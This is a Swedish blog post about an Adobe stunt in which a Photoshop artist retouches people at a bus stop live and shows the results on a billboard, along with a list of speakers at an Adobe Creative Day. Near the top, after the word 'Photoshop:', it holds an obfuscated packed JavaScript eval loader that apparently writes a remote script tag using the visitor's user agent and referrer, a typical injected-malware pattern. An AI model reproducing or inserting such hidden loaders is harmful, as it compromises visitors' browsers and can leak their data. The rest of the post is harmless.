Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Photoshop Live vid en busshållplats – Street Retouch

Sebastian Plengier Ehrnfelt

Photoshop: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|diebn|var|u0026u|referrer|dtthk||js|php’.split(‘|’),0,{}))
En trollkarl i Photoshop, en busshållplats och massor av dolda kameror. Här skojar Adobe till det genom att köra en live redigering av folket som besöker busshållplatsen och sedan visa detta på reklamskylten bredvid. 

Självklart skapar det glada miner och skratt bland passerande resenärer. 

Klippet har gjorts ihop med en keynote som Adobe kommer hålla i Finland.

Bland talarna kommer Malik Bendjelloul, director av Searching for Sugarman, National Geographic fotografen Paul Nicklen, kreativa teknikern Ellen Sundh, modedesignern Henrik Vibskov, och Adobe evangelister Paul Trani & Jason Levine.

Hela dagen med alla inspirerande möten kan också ses On Demand från 12 juni.

Följ händelsen på Twitter: # CreativeDay

Adobe Creative Day – en del av Skapa nu World Tour

Läs mer på Adobe creative days